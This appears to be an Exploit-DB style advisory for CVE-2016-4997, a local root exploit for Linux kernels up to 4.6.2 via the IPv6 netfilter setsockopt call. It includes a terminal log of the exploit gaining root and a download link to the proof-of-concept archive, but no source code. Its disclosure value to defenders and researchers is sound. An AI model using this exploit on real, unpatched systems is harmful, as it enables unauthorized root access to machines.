42 lines
No EOL
1.6 KiB
Text
42 lines
No EOL
1.6 KiB
Text
# Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call
|
|
# Date: 2016.10.8
|
|
# Exploit Author: Qian Zhang@MarvelTeam Qihoo 360
|
|
# Version: Linux kernel <= 4.6.2
|
|
# Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic
|
|
# CVE: CVE-2016-4997
|
|
# Reference:http://www.openwall.com/lists/oss-security/2016/09/29/10
|
|
# Contact: tyrande000@gmail.com
|
|
|
|
#DESCRIPTION
|
|
#===========
|
|
#The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields,
|
|
#which allows local users to escalade privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded.
|
|
|
|
zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ls
|
|
compile.sh enjoy enjoy.c pwn pwn.c version.h
|
|
zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables
|
|
[sudo] password for zhang_q:
|
|
zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn
|
|
pwn begin, let the bullets fly . . .
|
|
and wait for a minute . . .
|
|
pwn over, let's enjoy!
|
|
preparing payload . . .
|
|
trigger modified tty_release . . .
|
|
got root, enjoy :)
|
|
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE#
|
|
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# id
|
|
uid=0(root) gid=0(root) groups=0(root)
|
|
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl
|
|
Static hostname: ubuntu
|
|
Icon name: computer-vm
|
|
Chassis: vm
|
|
Machine ID: 355cdf4ce8a048288640c2aa933c018f
|
|
Virtualization: vmware
|
|
Operating System: Ubuntu 16.04.1 LTS
|
|
Kernel: Linux 4.4.0-21-generic
|
|
Architecture: x86-64
|
|
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE#
|
|
|
|
|
|
Proof of Concept:
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40489.zip |